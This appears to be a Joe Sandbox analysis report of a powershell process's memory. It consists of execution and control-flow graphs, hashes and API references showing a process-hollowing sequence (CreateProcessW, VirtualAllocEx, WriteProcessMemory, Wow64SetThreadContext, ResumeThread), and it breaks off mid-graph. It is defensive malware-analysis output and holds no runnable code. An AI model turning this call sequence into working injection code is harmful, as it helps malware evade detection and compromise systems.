                                                                                                                  execution_graph 9071 463940f 9072 46393f9 9071->9072 9073 46394b5 9072->9073 9076 46399ef 9072->9076 9074 463950d 9077 46399ff 9076->9077 9078 4639a21 9077->9078 9079 4639a3c 9077->9079 9100 46399ef 9 API calls 9077->9100 9101 4639d43 9077->9101 9115 4639a58 9077->9115 9078->9074 9079->9074 9096 463a050 9079->9096 9135 46385a4 9079->9135 9081 4639b60 9082 46385b0 Wow64SetThreadContext 9081->9082 9081->9096 9083 4639bcb 9082->9083 9084 4639cde VirtualAllocEx 9083->9084 9083->9096 9085 4639d2b 9084->9085 9086 4639d79 VirtualAllocEx 9085->9086 9087 4639dcd 9085->9087 9085->9096 9086->9087 9088 46385c8 WriteProcessMemory 9087->9088 9087->9096 9089 4639e17 9088->9089 9090 4639f61 9089->9090 9089->9096 9097 46385c8 WriteProcessMemory 9089->9097 9091 46385c8 WriteProcessMemory 9090->9091 9090->9096 9092 4639f8a 9091->9092 9093 46385d4 Wow64SetThreadContext 9092->9093 9092->9096 9094 4639fff 9093->9094 9095 463a010 ResumeThread 9094->9095 9094->9096 9095->9096 9096->9074 9097->9089 9100->9077 9102 4639d63 9101->9102 9104 4639dcd 9101->9104 9103 4639d79 VirtualAllocEx 9102->9103 9102->9104 9112 463a050 9102->9112 9103->9104 9104->9112 9139 46385c8 9104->9139 9106 4639e17 9107 4639f61 9106->9107 9106->9112 9114 46385c8 WriteProcessMemory 9106->9114 9108 46385c8 WriteProcessMemory 9107->9108 9107->9112 9109 4639f8a 9108->9109 9109->9112 9143 46385d4 9109->9143 9112->9077 9113 463a010 ResumeThread 9113->9112 9114->9106 9116 4639a56 9115->9116 9116->9077 9116->9115 9117 46385a4 CreateProcessW 9116->9117 9133 463a050 9116->9133 9118 4639b60 9117->9118 9118->9133 9147 46385b0 9118->9147 9120 4639bcb 9121 4639cde VirtualAllocEx 9120->9121 9120->9133 9122 4639d2b 9121->9122 9123 4639d79 VirtualAllocEx 9122->9123 9124 4639dcd 9122->9124 9122->9133 9123->9124 9125 46385c8 WriteProcessMemory 9124->9125 9124->9133 9126 4639e17 9125->9126 9127 4639f61 9126->9127 9126->9133 9134 46385c8 WriteProcessMemory 9126->9134 9128 46385c8 WriteProcessMemory 9127->9128 9127->9133 9129 4639f8a 9128->9129 9130 46385d4 Wow64SetThreadContext 9129->9130 9129->9133 9131 4639fff 9130->9131 9132 463a010 ResumeThread 9131->9132 9131->9133 9132->9133 9133->9077 9134->9126 9136 463a258 CreateProcessW 9135->9136 9138 463a3b1 9136->9138 9140 463a610 WriteProcessMemory 9139->9140 9142 463a69b 9140->9142 9142->9106 9145 463a498 Wow64SetThreadContext 9143->9145 9146 4639fff 9145->9146 9146->9112 9146->9113 9148 463a498 Wow64SetThreadContext 9147->9148 9150 463a512 9148->9150 9150->9120

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 0 74b03e0-74b0403 2 74b0409-74b040e 0->2 3 74b05de-74b05f9 0->3 4 74b0410-74b0416 2->4 5 74b0426-74b042a 2->5 11 74b061b-74b0620 3->11 12 74b05fb-74b0619 3->12 7 74b041a-74b0424 4->7 8 74b0418 4->8 9 74b058b-74b0595 5->9 10 74b0430-74b0434 5->10 7->5 8->5 13 74b05a3-74b05a9 9->13 14 74b0597-74b05a0 9->14 15 74b0447 10->15 16 74b0436-74b0445 10->16 17 74b0622-74b0623 11->17 18 74b0626-74b062e 11->18 12->11 19 74b05ab-74b05ad 13->19 20 74b05af-74b05bb 13->20 22 74b0449-74b044b 15->22 16->22 23 74b077a-74b07c6 17->23 24 74b0624 17->24 25 74b0630-74b0636 18->25 26 74b0646-74b064a 18->26 27 74b05bd-74b05db 19->27 20->27 22->9 28 74b0451-74b0471 22->28 42 74b07cc-74b07d1 23->42 43 74b0933-74b0938 23->43 24->18 29 74b063a-74b0644 25->29 30 74b0638 25->30 32 74b0650-74b0652 26->32 33 74b0727-74b0731 26->33 53 74b0473-74b048e 28->53 54 74b0490 28->54 29->26 30->26 39 74b0662 32->39 40 74b0654-74b0660 32->40 35 74b073f-74b0745 33->35 36 74b0733-74b073c 33->36 44 74b074b-74b0757 35->44 45 74b0747-74b0749 35->45 41 74b0664-74b0666 39->41 40->41 41->33 47 74b066c-74b0670 41->47 48 74b07e9-74b07ed 42->48 49 74b07d3-74b07d9 42->49 50 74b0759-74b0777 44->50 45->50 55 74b0672-74b068e 47->55 56 74b0690 47->56 60 74b07f3-74b07f5 48->60 61 74b08e2-74b08ec 48->61 58 74b07db 49->58 59 74b07dd-74b07e7 49->59 66 74b0492-74b0494 53->66 54->66 65 74b0692-74b0694 55->65 56->65 58->48 59->48 67 74b07f7-74b0803 60->67 68 74b0805 60->68 63 74b08fa-74b0900 61->63 64 74b08ee-74b08f7 61->64 73 74b0902-74b0904 63->73 74 74b0906-74b0912 63->74 65->33 76 74b069a-74b06ad 65->76 66->9 72 74b049a-74b049c 66->72 77 74b0807-74b0809 67->77 68->77 78 74b049e-74b04aa 72->78 79 74b04ac 72->79 80 74b0914-74b0930 73->80 74->80 94 74b06b3-74b06b5 76->94 77->61 81 74b080f-74b0811 77->81 85 74b04ae-74b04b0 78->85 79->85 88 74b0813-74b081f 81->88 89 74b0821 81->89 85->9 91 74b04b6-74b04d6 85->91 90 74b0823-74b0825 88->90 89->90 90->61 93 74b082b-74b082d 90->93 113 74b04d8-74b04de 91->113 114 74b04ee-74b04f2 91->114 95 74b082f-74b0835 93->95 96 74b0847-74b084b 93->96 98 74b06cd-74b0724 94->98 99 74b06b7-74b06bd 94->99 102 74b0839-74b0845 95->102 103 74b0837 95->103 104 74b084d-74b0853 96->104 105 74b0865-74b08df 96->105 106 74b06bf 99->106 107 74b06c1-74b06c3 99->107 102->96 103->96 108 74b0857-74b0863 104->108 109 74b0855 104->109 106->98 107->98 108->105 109->105 118 74b04e2-74b04e4 113->118 119 74b04e0 113->119 115 74b050c-74b0510 114->115 116 74b04f4-74b04fa 114->116 124 74b0517-74b0519 115->124 121 74b04fe-74b050a 116->121 122 74b04fc 116->122 118->114 119->114 121->115 122->115 125 74b051b-74b0521 124->125 126 74b0531-74b0588 124->126 128 74b0523 125->128 129 74b0525-74b0527 125->129 128->126 129->126
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1995528124.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_74b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                  • API String ID: 0-2118039658
                                                                                                                  • Opcode ID: ea0a4c93be3b3ff77a160efd659906fd94cdd9253a884cb435d631c148fecfd7
                                                                                                                  • Instruction ID: 1cbc224c25e42f1f22117eb0f8b68c1c591003d185036dc919395afd3a332708
                                                                                                                  • Opcode Fuzzy Hash: ea0a4c93be3b3ff77a160efd659906fd94cdd9253a884cb435d631c148fecfd7
                                                                                                                  • Instruction Fuzzy Hash: 1CD115B1B0020A8FDB349E6994406EBBBE5EFC5612F14886BD405CB361EB31CD86C7B1

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 131 74b1848-74b186e 132 74b1a1a-74b1a38 131->132 133 74b1874-74b1879 131->133 141 74b19d0 132->141 144 74b1a3a-74b1a4d 132->144 134 74b187b-74b1881 133->134 135 74b1891-74b1895 133->135 136 74b1883 134->136 137 74b1885-74b188f 134->137 138 74b189b-74b189d 135->138 139 74b19c6-74b19ce 135->139 136->135 137->135 142 74b189f-74b18ab 138->142 143 74b18ad 138->143 139->141 148 74b19de-74b19e4 141->148 149 74b19d2-74b19db 141->149 145 74b18af-74b18b1 142->145 143->145 146 74b1a4f-74b1a5b 144->146 147 74b1a5d 144->147 145->139 152 74b18b7-74b18bb 145->152 151 74b1a5f-74b1a61 146->151 147->151 153 74b19ea-74b19f6 148->153 154 74b19e6-74b19e8 148->154 155 74b1acf-74b1ad9 151->155 156 74b1a63-74b1a82 151->156 157 74b18ce 152->157 158 74b18bd-74b18cc 152->158 159 74b19f8-74b1a17 153->159 154->159 160 74b1adb-74b1adf 155->160 161 74b1ae2-74b1ae8 155->161 176 74b1a92 156->176 177 74b1a84-74b1a90 156->177 162 74b18d0-74b18d2 157->162 158->162 164 74b1aea-74b1aec 161->164 165 74b1aee-74b1afa 161->165 162->139 167 74b18d8-74b18da 162->167 169 74b1afc-74b1b1a 164->169 165->169 170 74b18ea 167->170 171 74b18dc-74b18e8 167->171 174 74b18ec-74b18ee 170->174 171->174 174->139 179 74b18f4-74b18f6 174->179 180 74b1a94-74b1a96 176->180 177->180 181 74b18f8-74b18fe 179->181 182 74b1910-74b191b 179->182 180->155 185 74b1a98-74b1ab5 180->185 187 74b1902-74b190e 181->187 188 74b1900 181->188 183 74b192a-74b1936 182->183 184 74b191d-74b1920 182->184 189 74b1938-74b193a 183->189 190 74b1944-74b194b 183->190 184->183 194 74b1b1d-74b1b22 185->194 195 74b1ab7-74b1ac9 185->195 187->182 188->182 189->190 193 74b1952-74b1954 190->193 196 74b196c-74b19c3 193->196 197 74b1956-74b195c 193->197 194->195 195->155 198 74b195e 197->198 199 74b1960-74b1962 197->199 198->196 199->196
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1995528124.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_74b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                                  • API String ID: 0-3272787073
                                                                                                                  • Opcode ID: 6a6c6d908ba8a3cd7cac33f469ca4891b9c9b78bf49cb248d2bc0a7952733621
                                                                                                                  • Instruction ID: c7260e883211a66bb21a7f72a60f035a0c0e29cdf169a46b8d6f299ab589e048
                                                                                                                  • Opcode Fuzzy Hash: 6a6c6d908ba8a3cd7cac33f469ca4891b9c9b78bf49cb248d2bc0a7952733621
                                                                                                                  • Instruction Fuzzy Hash: F47124B5B0034E9FCB354A7988606EB7BE6AF86610F14886BD804CB395DA31DD85C771

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 202 4639a58-4639a84 203 4639a8c-4639a8d 202->203 204 4639a56-4639a57 203->204 205 4639a8e-4639b09 203->205 204->202 209 463a241-463a256 205->209 210 4639b0f-4639b1f 205->210 213 4639b21-4639b26 210->213 214 4639b28 210->214 215 4639b2a-4639b2c 213->215 214->215 216 4639b43-4639b5b call 46385a4 215->216 217 4639b2e-4639b41 215->217 220 4639b60-4639b62 216->220 217->216 221 4639b64-4639b69 220->221 222 4639b6b 220->222 223 4639b6d-4639b6f 221->223 222->223 224 463a1b7-463a1ca 223->224 225 4639b75-4639b8a 223->225 232 463a1d1-463a1e7 224->232 228 463a1b2 225->228 229 4639b90-4639bb4 225->229 228->224 229->232 234 4639bba-4639bc6 call 46385b0 229->234 232->209 241 463a1e9-463a1f3 232->241 237 4639bcb-4639bcd 234->237 239 4639bd3-4639bda 237->239 240 463a155-463a157 237->240 242 4639be0-4639bea 239->242 243 463a13b-463a14e 239->243 246 463a1f5-463a1fc 241->246 247 463a1fe-463a200 241->247 242->232 244 4639bf0-4639c0d 242->244 243->240 244->228 249 4639c13-4639c2d call 46385bc 244->249 250 463a202-463a206 246->250 247->250 256 4639c33-4639c3a 249->256 257 463a15c 249->257 253 463a208 call 4638a08 250->253 254 463a20d-463a21a 250->254 253->254 269 463a221-463a23e 254->269 270 463a21c 254->270 259 463a121-463a134 256->259 260 4639c40-4639c49 256->260 264 463a163 257->264 259->243 262 4639cb4-4639cba 260->262 263 4639c4b-4639c8f 260->263 262->228 266 4639cc0-4639cd0 262->266 273 4639c91-4639c97 263->273 274 4639c98-4639ca4 263->274 271 463a16d 264->271 266->228 278 4639cd6 266->278 270->269 276 463a174 271->276 273->274 274->264 277 4639caa-4639cae 274->277 282 463a17b 276->282 277->262 280 463a107-463a11a 277->280 281 4639cde-4639d29 VirtualAllocEx 278->281 280->259 283 4639d32-4639d50 281->283 284 4639d2b-4639d31 281->284 286 463a182 282->286 283->271 287 4639d56-4639d5d 283->287 284->283 292 463a189 286->292 289 4639d63-4639d6a 287->289 290 4639de4-4639deb 287->290 289->276 293 4639d70-4639d77 289->293 290->282 294 4639df1-4639df8 290->294 298 463a193 292->298 293->290 295 4639d79-4639dcb VirtualAllocEx 293->295 296 4639dfe-4639e12 call 46385c8 294->296 297 463a0ed-463a100 294->297 299 4639dd4-4639dde 295->299 300 4639dcd-4639dd3 295->300 302 4639e17-4639e19 296->302 297->280 305 463a19a 298->305 299->290 300->299 302->286 304 4639e1f-4639e26 302->304 307 463a0d3-463a0e6 304->307 308 4639e2c-4639e35 304->308 311 463a1a1 305->311 307->297 308->228 310 4639e3b-4639e41 308->310 310->228 312 4639e47-4639e52 310->312 314 463a1ab 311->314 312->228 317 4639e58-4639e5e 312->317 314->228 318 4639f61-4639f72 317->318 319 4639e64-4639e69 317->319 318->228 322 4639f78-4639f85 call 46385c8 318->322 319->228 320 4639e6f-4639e82 319->320 320->228 325 4639e88-4639e9b 320->325 326 4639f8a-4639f8c 322->326 325->228 331 4639ea1-4639eb6 325->331 326->305 327 4639f92-4639f99 326->327 329 463a09f-463a0b2 327->329 330 4639f9f-4639fa5 327->330 346 463a0b9-463a0cc 329->346 330->228 332 4639fab-4639fbc 330->332 331->292 335 4639ebc-4639ec0 331->335 332->311 340 4639fc2-4639fc6 332->340 338 4639f47-4639f4a 335->338 339 4639ec6-4639ecf 335->339 338->228 344 4639f50-4639f53 338->344 339->228 341 4639ed5-4639ed8 339->341 342 4639fd1-4639fd9 340->342 343 4639fc8-4639fcb 340->343 341->228 347 4639ede-4639f0e 341->347 342->228 348 4639fdf-4639fe9 342->348 343->342 344->228 345 4639f59-4639f5b 344->345 345->318 345->319 346->307 347->228 359 4639f14-4639f2d call 46385c8 347->359 348->232 349 4639fef-4639ffa call 46385d4 348->349 353 4639fff-463a001 349->353 353->314 354 463a007-463a00e 353->354 357 463a010-463a04e ResumeThread 354->357 358 463a06b-463a07e 354->358 360 463a050-463a056 357->360 361 463a057-463a064 357->361 365 463a085-463a098 358->365 366 4639f32-4639f34 359->366 360->361 364 463a066 361->364 361->365 364->270 365->329 366->298 368 4639f3a-4639f41 366->368 368->338 368->346
                                                                                                                  APIs
                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,00000000,00003000,00000040), ref: 04639D12
                                                                                                                  • VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 04639DB4
                                                                                                                    • Part of subcall function 046385C8: WriteProcessMemory.KERNELBASE(?,00000000,00000000,18672514,00000000,?,?,?,00000000,00000000,?,04639E17,?,00000000,?), ref: 0463A68C
                                                                                                                  • ResumeThread.KERNELBASE(?), ref: 0463A037
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1950922521.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_4630000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocVirtual$MemoryProcessResumeThreadWrite
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2390764575-0
                                                                                                                  • Opcode ID: 8839a2c6c9df8f9480b40d96e09dcde835d996b5fccabb1d8ebefe9088b33c4a
                                                                                                                  • Instruction ID: d1c1e1c64044e0379c5f441b980f68906e4a2acfe415b7c2811e81f8e5a9e9be
                                                                                                                  • Opcode Fuzzy Hash: 8839a2c6c9df8f9480b40d96e09dcde835d996b5fccabb1d8ebefe9088b33c4a
                                                                                                                  • Instruction Fuzzy Hash: F412B070B002588BDB649F74CC54B9EB7F2AF84345F1081A9D449AB391EF70AE85DF92

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 372 46399ef-46399fa 373 46399ff-4639a08 372->373 556 4639a0a call 4639d43 373->556 557 4639a0a call 4639a58 373->557 558 4639a0a call 46399ef 373->558 374 4639a10-4639a12 375 4639a14-4639a16 374->375 376 4639a18 374->376 377 4639a1d-4639a1f 375->377 376->377 378 4639a21-4639a2a 377->378 379 4639a2b-4639a2e 377->379 381 4639a30-4639a33 379->381 382 4639a3c-4639a48 379->382 381->373 383 4639a35-4639a3b 381->383 385 4639a4a-4639a55 382->385 386 4639a8c-4639a8d 382->386 387 4639a56-4639a84 385->387 386->387 388 4639a8e-4639b09 386->388 387->386 393 463a241-463a256 388->393 394 4639b0f-4639b1f 388->394 397 4639b21-4639b26 394->397 398 4639b28 394->398 399 4639b2a-4639b2c 397->399 398->399 400 4639b43-4639b62 call 46385a4 399->400 401 4639b2e-4639b41 399->401 405 4639b64-4639b69 400->405 406 4639b6b 400->406 401->400 407 4639b6d-4639b6f 405->407 406->407 408 463a1b7-463a1ca 407->408 409 4639b75-4639b8a 407->409 416 463a1d1-463a1e7 408->416 412 463a1b2 409->412 413 4639b90-4639bb4 409->413 412->408 413->416 418 4639bba-4639bcd call 46385b0 413->418 416->393 425 463a1e9-463a1f3 416->425 423 4639bd3-4639bda 418->423 424 463a155-463a157 418->424 426 4639be0-4639bea 423->426 427 463a13b-463a14e 423->427 430 463a1f5-463a1fc 425->430 431 463a1fe-463a200 425->431 426->416 428 4639bf0-4639c0d 426->428 427->424 428->412 433 4639c13-4639c2d call 46385bc 428->433 434 463a202-463a206 430->434 431->434 440 4639c33-4639c3a 433->440 441 463a15c 433->441 437 463a208 call 4638a08 434->437 438 463a20d-463a21a 434->438 437->438 453 463a221-463a23e 438->453 454 463a21c 438->454 443 463a121-463a134 440->443 444 4639c40-4639c49 440->444 448 463a163 441->448 443->427 446 4639cb4-4639cba 444->446 447 4639c4b-4639c8f 444->447 446->412 450 4639cc0-4639cd0 446->450 457 4639c91-4639c97 447->457 458 4639c98-4639ca4 447->458 455 463a16d 448->455 450->412 462 4639cd6-4639d29 VirtualAllocEx 450->462 454->453 460 463a174 455->460 457->458 458->448 461 4639caa-4639cae 458->461 466 463a17b 460->466 461->446 464 463a107-463a11a 461->464 467 4639d32-4639d50 462->467 468 4639d2b-4639d31 462->468 464->443 470 463a182 466->470 467->455 471 4639d56-4639d5d 467->471 468->467 476 463a189 470->476 473 4639d63-4639d6a 471->473 474 4639de4-4639deb 471->474 473->460 477 4639d70-4639d77 473->477 474->466 478 4639df1-4639df8 474->478 482 463a193 476->482 477->474 479 4639d79-4639dcb VirtualAllocEx 477->479 480 4639dfe-4639e19 call 46385c8 478->480 481 463a0ed-463a100 478->481 483 4639dd4-4639dde 479->483 484 4639dcd-4639dd3 479->484 480->470 488 4639e1f-4639e26 480->488 481->464 489 463a19a 482->489 483->474 484->483 491 463a0d3-463a0e6 488->491 492 4639e2c-4639e35 488->492 495 463a1a1 489->495 491->481 492->412 494 4639e3b-4639e41 492->494 494->412 496 4639e47-4639e52 494->496 498 463a1ab 495->498 496->412 501 4639e58-4639e5e 496->501 498->412 502 4639f61-4639f72 501->502 503 4639e64-4639e69 501->503 502->412 506 4639f78-4639f8c call 46385c8 502->506 503->412 504 4639e6f-4639e82 503->504 504->412 509 4639e88-4639e9b 504->509 506->489 511 4639f92-4639f99 506->511 509->412 515 4639ea1-4639eb6 509->515 513 463a09f-463a0b2 511->513 514 4639f9f-4639fa5 511->514 530 463a0b9-463a0cc 513->530 514->412 516 4639fab-4639fbc 514->516 515->476 519 4639ebc-4639ec0 515->519 516->495 524 4639fc2-4639fc6 516->524 522 4639f47-4639f4a 519->522 523 4639ec6-4639ecf 519->523 522->412 528 4639f50-4639f53 522->528 523->412 525 4639ed5-4639ed8 523->525 526 4639fd1-4639fd9 524->526 527 4639fc8-4639fcb 524->527 525->412 531 4639ede-4639f0e 525->531 526->412 532 4639fdf-4639fe9 526->532 527->526 528->412 529 4639f59-4639f5b 528->529 529->502 529->503 530->491 531->412 543 4639f14-4639f2d call 46385c8 531->543 532->416 533 4639fef-463a001 call 46385d4 532->533 533->498 538 463a007-463a00e 533->538 541 463a010-463a04e ResumeThread 538->541 542 463a06b-463a07e 538->542 544 463a050-463a056 541->544 545 463a057-463a064 541->545 549 463a085-463a098 542->549 550 4639f32-4639f34 543->550 544->545 548 463a066 545->548 545->549 548->454 549->513 550->482 552 4639f3a-4639f41 550->552 552->522 552->530 556->374 557->374 558->374
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1950922521.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_4630000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 7efad14ede6d5817a79d200de3727dca6a944226ba765530d752debe02171466
                                                                                                                  • Instruction ID: 2dac86e441d7d7d60d2ff49b3a3a7dfc0bef53b0daf9e4d78af5caf6da0c865d
                                                                                                                  • Opcode Fuzzy Hash: 7efad14ede6d5817a79d200de3727dca6a944226ba765530d752debe02171466
                                                                                                                  • Instruction Fuzzy Hash: D202A170A002588FEB24CF64CC44B9AB7F6EF45345F1481A9E989A7391EB70EE85CF51

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 559 74b03cb-74b03d9 560 74b03fb-74b0403 559->560 561 74b03db-74b03f9 559->561 563 74b0409-74b040e 560->563 564 74b05de-74b05f9 560->564 561->560 565 74b0410-74b0416 563->565 566 74b0426-74b042a 563->566 572 74b061b-74b0620 564->572 573 74b05fb-74b0619 564->573 568 74b041a-74b0424 565->568 569 74b0418 565->569 570 74b058b-74b0595 566->570 571 74b0430-74b0434 566->571 568->566 569->566 574 74b05a3-74b05a9 570->574 575 74b0597-74b05a0 570->575 576 74b0447 571->576 577 74b0436-74b0445 571->577 578 74b0622-74b0623 572->578 579 74b0626-74b062e 572->579 573->572 580 74b05ab-74b05ad 574->580 581 74b05af-74b05bb 574->581 583 74b0449-74b044b 576->583 577->583 584 74b077a-74b07c6 578->584 585 74b0624 578->585 586 74b0630-74b0636 579->586 587 74b0646-74b064a 579->587 588 74b05bd-74b05db 580->588 581->588 583->570 589 74b0451-74b0471 583->589 603 74b07cc-74b07d1 584->603 604 74b0933-74b0938 584->604 585->579 590 74b063a-74b0644 586->590 591 74b0638 586->591 593 74b0650-74b0652 587->593 594 74b0727-74b0731 587->594 614 74b0473-74b048e 589->614 615 74b0490 589->615 590->587 591->587 600 74b0662 593->600 601 74b0654-74b0660 593->601 596 74b073f-74b0745 594->596 597 74b0733-74b073c 594->597 605 74b074b-74b0757 596->605 606 74b0747-74b0749 596->606 602 74b0664-74b0666 600->602 601->602 602->594 608 74b066c-74b0670 602->608 609 74b07e9-74b07ed 603->609 610 74b07d3-74b07d9 603->610 611 74b0759-74b0777 605->611 606->611 616 74b0672-74b068e 608->616 617 74b0690 608->617 621 74b07f3-74b07f5 609->621 622 74b08e2-74b08ec 609->622 619 74b07db 610->619 620 74b07dd-74b07e7 610->620 627 74b0492-74b0494 614->627 615->627 626 74b0692-74b0694 616->626 617->626 619->609 620->609 628 74b07f7-74b0803 621->628 629 74b0805 621->629 624 74b08fa-74b0900 622->624 625 74b08ee-74b08f7 622->625 634 74b0902-74b0904 624->634 635 74b0906-74b0912 624->635 626->594 637 74b069a-74b069d 626->637 627->570 633 74b049a-74b049c 627->633 638 74b0807-74b0809 628->638 629->638 639 74b049e-74b04aa 633->639 640 74b04ac 633->640 641 74b0914-74b0930 634->641 635->641 648 74b06a7-74b06ad 637->648 638->622 642 74b080f-74b0811 638->642 646 74b04ae-74b04b0 639->646 640->646 649 74b0813-74b081f 642->649 650 74b0821 642->650 646->570 652 74b04b6-74b04d6 646->652 655 74b06b3-74b06b5 648->655 651 74b0823-74b0825 649->651 650->651 651->622 654 74b082b-74b082d 651->654 674 74b04d8-74b04de 652->674 675 74b04ee-74b04f2 652->675 656 74b082f-74b0835 654->656 657 74b0847-74b084b 654->657 659 74b06cd-74b0724 655->659 660 74b06b7-74b06bd 655->660 663 74b0839-74b0845 656->663 664 74b0837 656->664 665 74b084d-74b0853 657->665 666 74b0865-74b08df 657->666 667 74b06bf 660->667 668 74b06c1-74b06c3 660->668 663->657 664->657 669 74b0857-74b0863 665->669 670 74b0855 665->670 667->659 668->659 669->666 670->666 679 74b04e2-74b04e4 674->679 680 74b04e0 674->680 676 74b050c-74b0510 675->676 677 74b04f4-74b04fa 675->677 685 74b0517-74b0519 676->685 682 74b04fe-74b050a 677->682 683 74b04fc 677->683 679->675 680->675 682->676 683->676 686 74b051b-74b0521 685->686 687 74b0531-74b0588 685->687 689 74b0523 686->689 690 74b0525-74b0527 686->690 689->687 690->687
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1995528124.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_74b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'^q$$^q$$^q
                                                                                                                  • API String ID: 0-2291298209
                                                                                                                  • Opcode ID: aff75ec66b520cd85e733bfa78d8e5f08c195e4f4e7f2de921456e60c744dac6
                                                                                                                  • Instruction ID: ecd728fe10824c32791dedd5be17875b99693ffa3909c776f54f815855e8911e
                                                                                                                  • Opcode Fuzzy Hash: aff75ec66b520cd85e733bfa78d8e5f08c195e4f4e7f2de921456e60c744dac6
                                                                                                                  • Instruction Fuzzy Hash: AE31EDF0A003069FDB348E2485407EB7BA4AF82256F554867C8059B6B6DB35CE86C772

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 692 74b0db8-74b0dda 693 74b0edd-74b0eec 692->693 694 74b0de0-74b0de5 692->694 706 74b0ef1-74b0ef8 693->706 695 74b0dfd-74b0e01 694->695 696 74b0de7-74b0ded 694->696 700 74b0e8f-74b0e99 695->700 701 74b0e07-74b0e09 695->701 698 74b0def 696->698 699 74b0df1-74b0dfb 696->699 698->695 699->695 702 74b0e9b-74b0ea3 700->702 703 74b0ea6-74b0eac 700->703 704 74b0e0b-74b0e17 701->704 705 74b0e19 701->705 709 74b0eae-74b0eb0 703->709 710 74b0eb2-74b0ebe 703->710 708 74b0e1b-74b0e1d 704->708 705->708 708->700 711 74b0e1f-74b0e2d 708->711 712 74b0ec0-74b0eda 709->712 710->712 716 74b0e2f-74b0e35 711->716 717 74b0e47-74b0e8c 711->717 719 74b0e39-74b0e45 716->719 720 74b0e37 716->720 719->717 720->717
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1995528124.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_74b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $^q$$^q$$^q
                                                                                                                  • API String ID: 0-831282457
                                                                                                                  • Opcode ID: 5f5c0ea46dfb8c9964e85551397d106f408e4429041c8f82a2c16d0450352aae
                                                                                                                  • Instruction ID: a749bcd2c683685656493c79efbc43b26dfe3ffec365e1fc2506cadc3b485ec6
                                                                                                                  • Opcode Fuzzy Hash: 5f5c0ea46dfb8c9964e85551397d106f408e4429041c8f82a2c16d0450352aae
                                                                                                                  • Instruction Fuzzy Hash: 1631C3B1B0020E8FC7349AA9D4006EBB7E6ABC5612F14C46BC419DB350DB31DD56C7A1

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 723 74b1828-74b186e 725 74b1a1a-74b1a38 723->725 726 74b1874-74b1879 723->726 734 74b19d0 725->734 737 74b1a3a-74b1a4d 725->737 727 74b187b-74b1881 726->727 728 74b1891-74b1895 726->728 729 74b1883 727->729 730 74b1885-74b188f 727->730 731 74b189b-74b189d 728->731 732 74b19c6-74b19ce 728->732 729->728 730->728 735 74b189f-74b18ab 731->735 736 74b18ad 731->736 732->734 741 74b19de-74b19e4 734->741 742 74b19d2-74b19db 734->742 738 74b18af-74b18b1 735->738 736->738 739 74b1a4f-74b1a5b 737->739 740 74b1a5d 737->740 738->732 745 74b18b7-74b18bb 738->745 744 74b1a5f-74b1a61 739->744 740->744 746 74b19ea-74b19f6 741->746 747 74b19e6-74b19e8 741->747 748 74b1acf-74b1ad9 744->748 749 74b1a63-74b1a82 744->749 750 74b18ce 745->750 751 74b18bd-74b18cc 745->751 752 74b19f8-74b1a17 746->752 747->752 753 74b1adb-74b1adf 748->753 754 74b1ae2-74b1ae8 748->754 769 74b1a92 749->769 770 74b1a84-74b1a90 749->770 755 74b18d0-74b18d2 750->755 751->755 757 74b1aea-74b1aec 754->757 758 74b1aee-74b1afa 754->758 755->732 760 74b18d8-74b18da 755->760 762 74b1afc-74b1b1a 757->762 758->762 763 74b18ea 760->763 764 